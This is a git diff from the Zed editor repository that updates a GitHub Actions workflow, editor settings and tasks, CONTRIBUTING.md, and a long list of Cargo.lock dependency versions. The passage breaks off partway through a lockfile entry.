1c6c5a562532891eb97ceb11f44b81f35612c026..d14f4aa92451aab9c36df49d3be128fd4797a4da 100644 --- a/.github/workflows/update_duplicate_magnets.yml +++ b/.github/workflows/update_duplicate_magnets.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest if: github.repository == 'zed-industries/zed' steps: - - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4 + - uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 - name: Set up Python uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5 @@ -21,7 +21,9 @@ jobs: run: pip install requests - name: Update duplicate magnets issue + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | python script/github-find-top-duplicated-bugs.py \ - --github-token ${{ secrets.GITHUB_TOKEN }} \ + --github-token "$GITHUB_TOKEN" \ --issue-number 46355 diff --git a/.zed/settings.json b/.zed/settings.json index e9bbe9aa4ffd142ad1733d4c18a4e54230a8b541..2ecbd5623d26bd32d40443f8553bf4062248ec45 100644 --- a/.zed/settings.json +++ b/.zed/settings.json @@ -58,8 +58,7 @@ "ensure_final_newline_on_save": true, "file_scan_exclusions": [ "crates/agent/src/edit_agent/evals/fixtures", - "crates/eval/worktrees/", - "crates/eval/repos/", + "crates/agent/src/tools/evals/fixtures", "**/.git", "**/.svn", "**/.hg", diff --git a/.zed/tasks.json b/.zed/tasks.json index b6a9d9f4cd794d205d028f12bd8300e70f988f55..be2ccefedca46406713d9abf116c5efa9390fdb8 100644 --- a/.zed/tasks.json +++ b/.zed/tasks.json @@ -4,13 +4,13 @@ "command": "./script/clippy", "args": [], "allow_concurrent_runs": true, - "use_new_terminal": false + "use_new_terminal": false, }, { "label": "cargo run --profile release-fast", "command": "cargo", "args": ["run", "--profile", "release-fast"], "allow_concurrent_runs": true, - "use_new_terminal": false - } + "use_new_terminal": false, + }, ] diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 740b33dd55790bd3cabfc75146d71854eca6375d..e7e7629825b5f487a3b00af525d36458eb91956c 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -26,6 +26,8 @@ If you're looking for concrete ideas: - [Triaged bugs with confirmed steps to reproduce](https://github.com/zed-industries/zed/issues?q=is%3Aissue%20state%3Aopen%20type%3ABug%20label%3Astate%3Areproducible). - [Area labels](https://github.com/zed-industries/zed/labels?q=area%3A*) to browse bugs in a specific part of the product you care about (after clicking on an area label, add type:Bug to the search). +If you're thinking about proposing or building a larger feature, read the [Zed Feature Process](./docs/src/development/feature-process.md) for how we think about feature design — what context to provide, what integration points to consider, and how to put together a strong proposal. + ## Sending changes The Zed culture values working code and synchronous conversations over long diff --git a/Cargo.lock b/Cargo.lock index 258d1fb4c500cb97e34bf925c8444ef37f667f51..97412711a55667a4976a35313eb6c0388acc74ef 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -15,7 +15,7 @@ dependencies = [ "collections", "env_logger 0.11.8", "file_icons", - "futures 0.3.31", + "futures 0.3.32", "gpui", "image", "indoc", @@ -36,7 +36,6 @@ dependencies = [ "smol", "task", "telemetry", - "tempfile", "terminal", "text", "ui", @@ -45,7 +44,6 @@ dependencies = [ "util", "uuid", "watch", - "zlog", ] [[package]] @@ -61,7 +59,7 @@ dependencies = [ "serde", "serde_json", "settings", - "theme", + "theme_settings", "ui", "util", "workspace", @@ -76,9 +74,9 @@ dependencies = [ "clock", "collections", "ctor", - "futures 0.3.31", + "fs", + "futures 0.3.32", "gpui", - "indoc", "language", "log", "pretty_assertions", @@ -102,34 +100,24 @@ dependencies = [ "editor", "extension_host", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "language", "project", "proto", - "release_channel", "smallvec", "ui", "util", "workspace", ] -[[package]] -name = "addr2line" -version = "0.24.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dfbe277e56a376000877090da837660b4427aad530e3028d44e0bffe4f89a1c1" -dependencies = [ - "gimli 0.31.1", -] - [[package]] name = "addr2line" version = "0.25.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1b5d307320b3181d6d7954e663bd7c774a838b8220fe0593c86d9fb09f498b4b" dependencies = [ - "gimli 0.32.3", + "gimli", ] [[package]] @@ -169,13 +157,13 @@ dependencies = [ "context_server", "ctor", "db", - "derive_more 0.99.20", + "derive_more", "editor", "env_logger 0.11.8", "eval_utils", "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "git", "gpui", "gpui_tokio", @@ -213,11 +201,9 @@ dependencies = [ "task", "telemetry", "tempfile", - "terminal", "text", "theme", "thiserror 2.0.17", - "tree-sitter-rust", "ui", "unindent", "url", @@ -225,7 +211,6 @@ dependencies = [ "uuid", "watch", "web_search", - "worktree", "zed_env_vars", "zlog", "zstd", @@ -233,16 +218,16 @@ dependencies = [ [[package]] name = "agent-client-protocol" -version = "0.9.4" +version = "0.10.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2659b1089101b15db31137710159421cb44785ecdb5ba784be3b4a6f8cb8a475" +checksum = "9c56a59cf6315e99f874d2c1f96c69d2da5ffe0087d211297fc4a41f849770a2" dependencies = [ "agent-client-protocol-schema", "anyhow", "async-broadcast", "async-trait", - "derive_more 2.0.1", - "futures 0.3.31", + "derive_more", + "futures 0.3.32", "log", "serde", "serde_json", @@ -250,16 +235,16 @@ dependencies = [ [[package]] name = "agent-client-protocol-schema" -version = "0.10.8" +version = "0.11.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "44bc1fef9c32f03bce2ab44af35b6f483bfd169bf55cc59beeb2e3b1a00ae4d1" +checksum = "e0497b9a95a404e35799904835c57c6f8c69b9d08ccfd3cb5b7d746425cd6789" dependencies = [ "anyhow", - "derive_more 2.0.1", + "derive_more", "schemars", "serde", "serde_json", - "strum 0.27.2", + "strum 0.28.0", ] [[package]] @@ -275,16 +260,15 @@ dependencies = [ "chrono", "client", "collections", - "credentials_provider", "env_logger 0.11.8", + "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "google_ai", "gpui", "gpui_tokio", "http_client", "indoc", - "language", "language_model", "libc", "log", @@ -304,6 +288,7 @@ dependencies = [ "util", "uuid", "watch", + "zed_credentials_provider", ] [[package]] @@ -341,19 +326,12 @@ dependencies = [ "agent_settings", "ai_onboarding", "anyhow", - "arrayvec", - "assistant_slash_command", - "assistant_slash_commands", - "assistant_text_thread", - "async-fs", "audio", "base64 0.22.1", "buffer_diff", "chrono", "client", - "clock", "cloud_api_types", - "cloud_llm_client", "collections", "command_palette_hooks", "component", @@ -366,10 +344,12 @@ dependencies = [ "feature_flags", "file_icons", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", + "git", "gpui", "gpui_tokio", + "heapless", "html_to_markdown", "http_client", "image", @@ -396,14 +376,11 @@ dependencies = [ "prompt_store", "proto", "rand 0.9.2", - "recent_projects", "release_channel", - "remote_connection", "reqwest_client", "rope", "rules_library", "schemars", - "search", "semver", "serde", "serde_json", @@ -413,14 +390,13 @@ dependencies = [ "streaming_diff", "task", "telemetry", - "tempfile", "terminal", "terminal_view", "text", "theme", + "theme_settings", "time", "time_format", - "title_bar", "tree-sitter-md", "ui", "ui_input", @@ -524,21 +500,6 @@ dependencies = [ "equator", ] -[[package]] -name = "alloc-no-stdlib" -version = "2.0.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cc7bb162ec39d46ab1ca8c77bf72e890535becd1751bb45f64c597edb4c8c6b3" - -[[package]] -name = "alloc-stdlib" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "94fb8275041c72129eb51b7d0322c29b8387a0386127718b096429201a5d6ece" -dependencies = [ - "alloc-no-stdlib", -] - [[package]] name = "allocator-api2" version = "0.2.21" @@ -601,6 +562,17 @@ version = "0.1.6" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "4b46cbb362ab8752921c97e041f5e366ee6297bd428a31275b9fcf1e380f7299" +[[package]] +name = "annotate-snippets" +version = "0.12.12" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c86cd1c51b95d71dde52bca69ed225008f6ff4c8cc825b08042aa1ef823e1980" +dependencies = [ + "anstyle", + "memchr", + "unicode-width", +] + [[package]] name = "anstream" version = "0.6.21" @@ -657,18 +629,13 @@ version = "0.1.0" dependencies = [ "anyhow", "chrono", - "futures 0.3.31", - "gpui", - "gpui_tokio", + "futures 0.3.32", "http_client", - "reqwest_client", "schemars", "serde", "serde_json", - "settings", "strum 0.27.2", "thiserror 2.0.17", - "tokio", ] [[package]] @@ -692,6 +659,15 @@ dependencies = [ "num-traits", ] +[[package]] +name = "ar_archive_writer" +version = "0.5.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7eb93bbb63b9c227414f6eb3a0adfddca591a8ce1e9b60661bb08969b87e340b" +dependencies = [ + "object", +] + [[package]] name = "arbitrary" version = "1.4.2" @@ -701,6 +677,15 @@ dependencies = [ "derive_arbitrary", ] +[[package]] +name = "arc-swap" +version = "1.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a07d1f37ff60921c83bdfc7407723bdefe89b44b98a9b772f225c8f9d67141a6" +dependencies = [ + "rustversion", +] + [[package]] name = "arg_enum_proc_macro" version = "0.3.4" @@ -709,7 +694,7 @@ checksum = "0ae92a5119aa49cdbcf6b9f893fe4e1d98b04ccbf82ee0584ad948a44a734dea" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -729,9 +714,6 @@ name = "arrayvec" version = "0.7.6" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7c02d123df017efcdfbd739ef81735b36c5ba83ec3c59c80a9d7ecc718f92e50" -dependencies = [ - "serde", -] [[package]] name = "as-raw-xcb-connection" @@ -777,7 +759,7 @@ name = "askpass" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "gpui", "log", "net", @@ -797,110 +779,6 @@ dependencies = [ "rust-embed", ] -[[package]] -name = "assistant_slash_command" -version = "0.1.0" -dependencies = [ - "anyhow", - "async-trait", - "collections", - "derive_more 0.99.20", - "extension", - "futures 0.3.31", - "gpui", - "language", - "language_model", - "parking_lot", - "pretty_assertions", - "serde", - "serde_json", - "ui", - "util", - "workspace", -] - -[[package]] -name = "assistant_slash_commands" -version = "0.1.0" -dependencies = [ - "anyhow", - "assistant_slash_command", - "chrono", - "collections", - "editor", - "feature_flags", - "fs", - "futures 0.3.31", - "fuzzy", - "gpui", - "html_to_markdown", - "http_client", - "language", - "multi_buffer", - "pretty_assertions", - "project", - "prompt_store", - "rope", - "serde", - "serde_json", - "settings", - "smol", - "text", - "ui", - "util", - "workspace", - "worktree", - "zlog", -] - -[[package]] -name = "assistant_text_thread" -version = "0.1.0" -dependencies = [ - "agent_settings", - "anyhow", - "assistant_slash_command", - "assistant_slash_commands", - "chrono", - "client", - "clock", - "cloud_llm_client", - "collections", - "context_server", - "fs", - "futures 0.3.31", - "fuzzy", - "gpui", - "indoc", - "itertools 0.14.0", - "language", - "language_model", - "log", - "open_ai", - "parking_lot", - "paths", - "pretty_assertions", - "project", - "prompt_store", - "proto", - "rand 0.9.2", - "regex", - "rpc", - "serde", - "serde_json", - "settings", - "smallvec", - "smol", - "telemetry", - "text", - "ui", - "unindent", - "util", - "uuid", - "workspace", - "zed_env_vars", -] - [[package]] name = "async-attributes" version = "1.1.2" @@ -1076,7 +954,7 @@ name = "async-pipe" version = "0.1.3" source = "git+https://github.com/zed-industries/async-pipe-rs?rev=82d00a04211cf4e1236029aa03e6b6ce2a74c553#82d00a04211cf4e1236029aa03e6b6ce2a74c553" dependencies = [ - "futures 0.3.31", + "futures 0.3.32", "log", ] @@ -1106,7 +984,7 @@ checksum = "3b43422f69d8ff38f95f1b2bb76517c91589a924d1559a0e935d7c8ce0274c11" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -1174,7 +1052,7 @@ checksum = "c7c24de15d275a1ecfd47a380fb4d5ec9bfe0933f309ed5e705b775596a3574d" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -1204,7 +1082,7 @@ checksum = "9035ad2d096bed7955a320ee7e2230574d28fd3c3a0f186cbea1ff3c7eed5dbb" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -1278,7 +1156,6 @@ name = "audio" version = "0.1.0" dependencies = [ "anyhow", - "async-tar", "collections", "cpal", "crossbeam", @@ -1290,7 +1167,6 @@ dependencies = [ "rodio", "serde", "settings", - "smol", "thiserror 2.0.17", "util", ] @@ -1316,7 +1192,7 @@ dependencies = [ "clock", "ctor", "db", - "futures 0.3.31", + "futures 0.3.32", "futures-lite 1.13.0", "gpui", "http_client", @@ -1342,6 +1218,7 @@ version = "0.1.0" dependencies = [ "anyhow", "log", + "scopeguard", "simplelog", "tempfile", "windows 0.61.3", @@ -1944,11 +1821,11 @@ version = "0.3.76" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "bb531853791a215d7c62a30daf0dde835f381ab5de4589cfe7c649d2cbe92bd6" dependencies = [ - "addr2line 0.25.1", + "addr2line", "cfg-if", "libc", "miniz_oxide", - "object 0.37.3", + "object", "rustc-demangle", "windows-link 0.2.1", ] @@ -1994,7 +1871,7 @@ dependencies = [ "anyhow", "aws-sdk-bedrockruntime", "aws-smithy-types", - "futures 0.3.31", + "futures 0.3.32", "schemars", "serde", "serde_json", @@ -2042,7 +1919,7 @@ dependencies = [ "regex", "rustc-hash 2.1.1", "shlex", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -2060,7 +1937,7 @@ dependencies = [ "regex", "rustc-hash 2.1.1", "shlex", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -2069,7 +1946,16 @@ version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "08807e080ed7f9d5433fa9b275196cfc35414f66a0c79d864dc51a0d825231a3" dependencies = [ - "bit-vec", + "bit-vec 0.8.0", +] + +[[package]] +name = "bit-set" +version = "0.9.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "34ddef2995421ab6a5c779542c81ee77c115206f4ad9d5a8e05f4ff49716a3dd" +dependencies = [ + "bit-vec 0.9.1", ] [[package]] @@ -2078,6 +1964,12 @@ version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5e764a1d40d510daf35e07be9eb06e75770908c27d411ee6c92109c9840eaaf7" +[[package]] +name = "bit-vec" +version = "0.9.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b71798fca2c1fe1086445a7258a4bc81e6e49dcd24c8d0dd9a1e57395b603f51" + [[package]] name = "bit_field" version = "0.10.3" @@ -2163,6 +2055,16 @@ dependencies = [ "piper", ] +[[package]] +name = "bmrng" +version = "0.5.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d54df9073108f1558f90ae6c5bf5ab9c917c4185f5527b280c87a993cbead0ac" +dependencies = [ + "futures-core", + "tokio", +] + [[package]] name = "bon" version = "3.8.2" @@ -2179,13 +2081,13 @@ version = "3.8.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "89ec27229c38ed0eb3c0feee3d2c1d6a4379ae44f418a29a658890e062d8f365" dependencies = [ - "darling", + "darling 0.21.3", "ident_case", "prettyplease", "proc-macro2", "quote", "rustversion", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -2214,7 +2116,7 @@ dependencies = [ "proc-macro-crate", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -2226,27 +2128,6 @@ dependencies = [ "workspace", ] -[[package]] -name = "brotli" -version = "8.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4bd8b9603c7aa97359dbd97ecf258968c95f3adddd6db2f7e7a5bef101c84560" -dependencies = [ - "alloc-no-stdlib", - "alloc-stdlib", - "brotli-decompressor", -] - -[[package]] -name = "brotli-decompressor" -version = "5.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "874bb8112abecc98cbd6d81ea4fa7e94fb9449648c93cc89aa40c81c24d7de03" -dependencies = [ - "alloc-no-stdlib", - "alloc-stdlib", -] - [[package]] name = "brush-parser" version = "0.3.0" @@ -2279,7 +2160,7 @@ version = "0.1.0" dependencies = [ "clock", "ctor", - "futures 0.3.31", + "futures 0.3.32", "git2", "gpui", "language", @@ -2287,7 +2168,6 @@ dependencies = [ "pretty_assertions", "rand 0.9.2", "rope", - "serde_json", "settings", "sum_tree", "text", @@ -2364,7 +2244,7 @@ checksum = "f9abbd1bc6865053c427f7198e6af43bfdedc55ab791faed4fbd361d789575ff" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -2415,6 +2295,15 @@ dependencies = [ "libc", ] +[[package]] +name = "bzip2" +version = "0.6.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f3a53fac24f34a81bc9954b5d6cfce0c21e18ec6959f44f56e8e90e4bb7c346c" +dependencies = [ + "libbz2-rs-sys", +] + [[package]] name = "bzip2-sys" version = "0.1.13+1.0.8" @@ -2446,10 +2335,10 @@ version = "0.25.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "9225bdcf4e4a9a4c08bf16607908eb2fbf746828d5e0b5e019726dbf6571f201" dependencies = [ - "darling", + "darling 0.20.11", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -2468,10 +2357,9 @@ dependencies = [ "collections", "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_tokio", - "http_client", "language", "livekit_client", "log", @@ -2651,6 +2539,16 @@ dependencies = [ "serde", ] +[[package]] +name = "cargo-platform" +version = "0.3.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "87a0c0e6148f11f01f32650a2ea02d532b2ad4e81d8bd41e6e565b5adc5e6082" +dependencies = [ + "serde", + "serde_core", +] + [[package]] name = "cargo_metadata" version = "0.19.2" @@ -2658,7 +2556,21 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "dd5eb614ed4c27c5d706420e4320fbe3216ab31fa1c33cd8246ac36dae4479ba" dependencies = [ "camino", - "cargo-platform", + "cargo-platform 0.1.9", + "semver", + "serde", + "serde_json", + "thiserror 2.0.17", +] + +[[package]] +name = "cargo_metadata" +version = "0.23.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ef987d17b0a113becdd19d3d0022d04d7ef41f9efe4f3fb63ac44ba61df3ade9" +dependencies = [ + "camino", + "cargo-platform 0.3.2", "semver", "serde", "serde_json", @@ -2703,7 +2615,7 @@ dependencies = [ "quote", "serde", "serde_json", - "syn 2.0.106", + "syn 2.0.117", "tempfile", "toml 0.8.23", ] @@ -2745,6 +2657,16 @@ dependencies = [ "target-lexicon 0.12.16", ] +[[package]] +name = "cfg-expr" +version = "0.20.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "78cef5b5a1a6827c7322ae2a636368a573006b27cfa76c7ebd53e834daeaab6a" +dependencies = [ + "smallvec", + "target-lexicon 0.13.3", +] + [[package]] name = "cfg-if" version = "1.0.4" @@ -2780,7 +2702,7 @@ dependencies = [ "client", "clock", "collections", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http_client", "language", @@ -2922,7 +2844,7 @@ dependencies = [ "heck 0.5.0", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -2967,18 +2889,21 @@ dependencies = [ "chrono", "clock", "cloud_api_client", + "cloud_api_types", "cloud_llm_client", "collections", "credentials_provider", - "derive_more 0.99.20", + "db", + "derive_more", "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_tokio", "http_client", "http_client_tls", "httparse", + "language_model", "log", "objc2-foundation", "parking_lot", @@ -3010,6 +2935,7 @@ dependencies = [ "util", "windows 0.61.3", "worktree", + "zed_credentials_provider", ] [[package]] @@ -3027,7 +2953,7 @@ version = "0.1.0" dependencies = [ "anyhow", "cloud_api_types", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_tokio", "http_client", @@ -3056,8 +2982,6 @@ name = "cloud_llm_client" version = "0.1.0" dependencies = [ "anyhow", - "indoc", - "pretty_assertions", "serde", "serde_json", "strum 0.27.2", @@ -3143,17 +3067,6 @@ dependencies = [ "objc", ] -[[package]] -name = "codespan-reporting" -version = "0.12.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fe6d2e5af09e8c8ad56c969f2157a3d4238cebc7c55f0a517728c38f7b200f81" -dependencies = [ - "serde", - "termcolor", - "unicode-width", -] - [[package]] name = "codespan-reporting" version = "0.13.0" @@ -3172,7 +3085,7 @@ dependencies = [ "anyhow", "edit_prediction", "edit_prediction_types", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http_client", "icons", @@ -3182,6 +3095,8 @@ dependencies = [ "serde", "serde_json", "text", + "zed_credentials_provider", + "zeta_prompt", ] [[package]] @@ -3189,15 +3104,9 @@ name = "collab" version = "0.44.0" dependencies = [ "agent", - "agent-client-protocol", - "agent_settings", - "agent_ui", "anyhow", - "assistant_slash_command", - "assistant_text_thread", "async-trait", "async-tungstenite", - "audio", "aws-config", "aws-sdk-kinesis", "aws-sdk-s3", @@ -3213,10 +3122,8 @@ dependencies = [ "collab_ui", "collections", "command_palette_hooks", - "context_server", "ctor", "dap", - "dap-types", "dap_adapters", "dashmap", "debugger_ui", @@ -3225,7 +3132,7 @@ dependencies = [ "extension", "file_finder", "fs", - "futures 0.3.31", + "futures 0.3.32", "git", "git_hosting_providers", "git_ui", @@ -3233,7 +3140,6 @@ dependencies = [ "gpui_tokio", "hex", "http_client", - "hyper 0.14.32", "indoc", "language", "language_model", @@ -3274,8 +3180,8 @@ dependencies = [ "telemetry_events", "text", "theme", + "theme_settings", "time", - "title_bar", "tokio", "toml 0.8.23", "tower 0.4.13", @@ -3303,15 +3209,14 @@ dependencies = [ "collections", "db", "editor", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", - "http_client", + "livekit_client", "log", "menu", "notifications", "picker", - "pretty_assertions", "project", "release_channel", "rpc", @@ -3321,13 +3226,14 @@ dependencies = [ "smallvec", "telemetry", "theme", + "theme_settings", "time", "time_format", "title_bar", - "tree-sitter-md", "ui", "util", "workspace", + "zed_actions", ] [[package]] @@ -3378,10 +3284,8 @@ dependencies = [ "client", "collections", "command_palette_hooks", - "ctor", "db", "editor", - "env_logger 0.11.8", "fuzzy", "go_to_line", "gpui", @@ -3392,10 +3296,10 @@ dependencies = [ "postage", "project", "serde", - "serde_json", "settings", "telemetry", "theme", + "theme_settings", "time", "ui", "util", @@ -3408,11 +3312,30 @@ name = "command_palette_hooks" version = "0.1.0" dependencies = [ "collections", - "derive_more 0.99.20", + "derive_more", "gpui", "workspace", ] +[[package]] +name = "compliance" +version = "0.1.0" +dependencies = [ + "anyhow", + "async-trait", + "derive_more", + "futures 0.3.32", + "indoc", + "itertools 0.14.0", + "jsonwebtoken", + "octocrab", + "regex", + "semver", + "serde", + "serde_json", + "tokio", +] + [[package]] name = "component" version = "0.1.0" @@ -3448,6 +3371,7 @@ dependencies = [ "session", "settings", "theme", + "theme_settings", "ui", "ui_input", "uuid", @@ -3460,6 +3384,7 @@ version = "0.4.31" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ef8a506ec4b81c460798f572caead636d57d3d7e940f998160f52bd254bf2d23" dependencies = [ + "bzip2 0.6.1", "compression-core", "deflate64", "flate2", @@ -3562,37 +3487,53 @@ version = "0.1.0" dependencies = [ "anyhow", "async-trait", + "base64 0.22.1", "collections", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http_client", "log", "net", "parking_lot", "postage", + "rand 0.9.2", "schemars", "serde", "serde_json", "settings", + "sha2", "slotmap", "smol", "tempfile", "terminal", + "tiny_http", "url", "util", ] [[package]] name = "convert_case" -version = "0.4.0" +version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6245d59a3e82a7fc217c5828a6692dbc6dfb63a0c8c90495621f7b9d79704a0e" +checksum = "baaaa0ecca5b51987b9423ccdc971514dd8b0bb7b4060b983d3664dad3f1f89f" +dependencies = [ + "unicode-segmentation", +] [[package]] name = "convert_case" -version = "0.8.0" +version = "0.10.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "baaaa0ecca5b51987b9423ccdc971514dd8b0bb7b4060b983d3664dad3f1f89f" +checksum = "633458d4ef8c78b72454de2d54fd6ab2e60f9e02be22f3c6104cdc8a4e0fceb9" +dependencies = [ + "unicode-segmentation", +] + +[[package]] +name = "convert_case" +version = "0.11.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "affbf0190ed2caf063e3def54ff444b449371d55c58e513a95ab98eca50adb49" dependencies = [ "unicode-segmentation", ] @@ -3603,18 +3544,14 @@ version = "0.1.0" dependencies = [ "anyhow", "async-std", - "client", - "clock", "collections", "command_palette_hooks", "copilot_chat", - "ctor", "edit_prediction_types", "editor", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", - "http_client", "icons", "indoc", "language", @@ -3632,6 +3569,7 @@ dependencies = [ "settings", "sum_tree", "theme", + "theme_settings", "util", "workspace", "zlog", @@ -3641,11 +3579,12 @@ dependencies = [ name = "copilot_chat" version = "0.1.0" dependencies = [ + "anthropic", "anyhow", "collections", "dirs 4.0.0", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http_client", "log", @@ -3926,36 +3865,36 @@ dependencies = [ [[package]] name = "cranelift-assembler-x64" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a5023e06632d8f351c2891793ccccfe4aef957954904392434038745fb6f1f68" +checksum = "ba33ddc4e157cb1abe9da6c821e8824f99e56d057c2c22536850e0141f281d61" dependencies = [ "cranelift-assembler-x64-meta", ] [[package]] name = "cranelift-assembler-x64-meta" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b1c4012b4c8c1f6eb05c0a0a540e3e1ee992631af51aa2bbb3e712903ce4fd65" +checksum = "69b23dd6ea360e6fb28a3f3b40b7f126509668f58076a4729b2cfd656f26a0ad" dependencies = [ "cranelift-srcgen", ] [[package]] name = "cranelift-bforest" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4d6d883b4942ef3a7104096b8bc6f2d1a41393f159ac8de12aed27b25d67f895" +checksum = "a9d81afcee8fe27ee2536987df3fadcb2e161af4edb7dbe3ef36838d0ce74382" dependencies = [ "cranelift-entity", ] [[package]] name = "cranelift-bitset" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "db7b2ee9eec6ca8a716d900d5264d678fb2c290c58c46c8da7f94ee268175d17" +checksum = "fb33595f1279fe7af03b28245060e9085caf98b10ed3137461a85796eb83972a" dependencies = [ "serde", "serde_derive", @@ -3963,9 +3902,9 @@ dependencies = [ [[package]] name = "cranelift-codegen" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "aeda0892577afdce1ac2e9a983a55f8c5b87a59334e1f79d8f735a2d7ba4f4b4" +checksum = "0230a6ac0660bfe31eb244cbb43dcd4f2b3c1c4e0addc3e0348c6053ea60272e" dependencies = [ "bumpalo", "cranelift-assembler-x64", @@ -3976,7 +3915,7 @@ dependencies = [ "cranelift-control", "cranelift-entity", "cranelift-isle", - "gimli 0.31.1", + "gimli", "hashbrown 0.15.5", "log", "postcard", @@ -3988,40 +3927,42 @@ dependencies = [ "sha2", "smallvec", "target-lexicon 0.13.3", + "wasmtime-internal-math", ] [[package]] name = "cranelift-codegen-meta" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e461480d87f920c2787422463313326f67664e68108c14788ba1676f5edfcd15" +checksum = "96d6817fdc15cb8f236fc9d8e610767d3a03327ceca4abff7a14d8e2154c405e" dependencies = [ "cranelift-assembler-x64-meta", "cranelift-codegen-shared", "cranelift-srcgen", + "heck 0.5.0", "pulley-interpreter", ] [[package]] name = "cranelift-codegen-shared" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "976584d09f200c6c84c4b9ff7af64fc9ad0cb64dffa5780991edd3fe143a30a1" +checksum = "0403796328e9e2e7df2b80191cdbb473fd9ea3889eb45ef5632d0fef168ea032" [[package]] name = "cranelift-control" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "46d43d70f4e17c545aa88dbf4c84d4200755d27c6e3272ebe4de65802fa6a955" +checksum = "188f04092279a3814e0b6235c2f9c2e34028e4beb72da7bfed55cbd184702bcc" dependencies = [ "arbitrary", ] [[package]] name = "cranelift-entity" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d75418674520cb400c8772bfd6e11a62736c78fc1b6e418195696841d1bf91f1" +checksum = "43f5e7391167605d505fe66a337e1a69583b3f34b63d359ffa5a430313c555e8" dependencies = [ "cranelift-bitset", "serde", @@ -4030,9 +3971,9 @@ dependencies = [ [[package]] name = "cranelift-frontend" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3c8b1a91c86687a344f3c52dd6dfb6e50db0dfa7f2e9c7711b060b3623e1fdeb" +checksum = 